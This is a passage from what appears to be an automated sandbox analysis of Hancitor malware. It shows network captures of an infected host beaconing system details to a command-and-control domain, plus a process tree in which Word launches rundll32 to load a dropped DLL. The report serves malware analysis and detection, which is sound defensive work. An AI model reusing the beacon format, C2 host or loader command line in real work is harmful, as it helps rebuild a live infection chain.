                                        Jul 9, 2021 03:08:20.207606077 CEST404INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:21 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cZFUAARRABw==0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        99192.168.2.224926477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 9, 2021 03:08:20.490206003 CEST405OUTPOST /8/forum.php HTTP/1.1
                                        Accept: */*
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Host: sudepallon.com
                                        Content-Length: 112
                                        Cache-Control: no-cache
                                        Data Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                        Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                                        Jul 9, 2021 03:08:20.557281017 CEST405INHTTP/1.1 200 OK
                                        Server: nginx/1.20.1
                                        Date: Fri, 09 Jul 2021 01:08:22 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.4.45
                                        Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: cCKPXARRABw==0


                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:03:06:35
                                        Start date:09/07/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                        Imagebase:0x13f170000
                                        File size:1424032 bytes
                                        MD5 hash:95C38D04597050285A18F66039EDB456
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:03:06:40
                                        Start date:09/07/2021
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
                                        Imagebase:0xffb00000
                                        File size:45568 bytes
                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:03:06:40
                                        Start date:09/07/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
                                        Imagebase:0x600000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:03:07:15
                                        Start date:09/07/2021
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\svchost.exe
                                        Imagebase:0xa0000
                                        File size:20992 bytes
                                        MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Disassembly

                                        Code Analysis

                                        Reset < >